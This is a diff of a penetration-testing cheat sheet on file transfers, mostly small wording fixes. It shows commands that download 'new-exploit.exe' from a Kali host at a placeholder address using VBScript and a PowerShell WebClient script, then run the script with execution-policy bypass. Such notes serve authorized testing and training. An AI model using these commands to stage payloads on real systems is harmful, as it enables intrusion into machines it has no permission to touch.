jsom1/jsom1.github.io/_CheatSheets/FileTransfers.md

 cscript wget.vbs http://<Kali IP>/<File to download> <Name of the downloaded file>
 `````

-#### Powershell
+## Powershell
+PowerShell can be used to transfer files between Kali and Windows in both directions.\\
+**Kali -> Windows** (start a web server on Kali):

-Create a Powershell downloader script on the Windows machine:
+Create a Powershell downloader script (*wget.ps1*) on the Windows machine:
 ````
 echo $webclient = New-Object System.Net.WebClient >>wget.ps1
 echo $url = "http://<Kali IP>/<File to download>" >>wget.ps1
 echo $file = "new-exploit.exe" >>wget.ps1
 echo $webclient.DownloadFile($url,$file) >>wget.ps1
 `````
-Run this script on Windows:
+Run the script:
 ````
 powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File wget.ps1
 ````
-The execution of ppowershell scripts is restricted by default, so we allow it with _-ExecutionPolicy Bypass_.
+The execution of powershell scripts is restricted by default, so we allow it with _-ExecutionPolicy Bypass_.

 Alternative one-liners:
 ````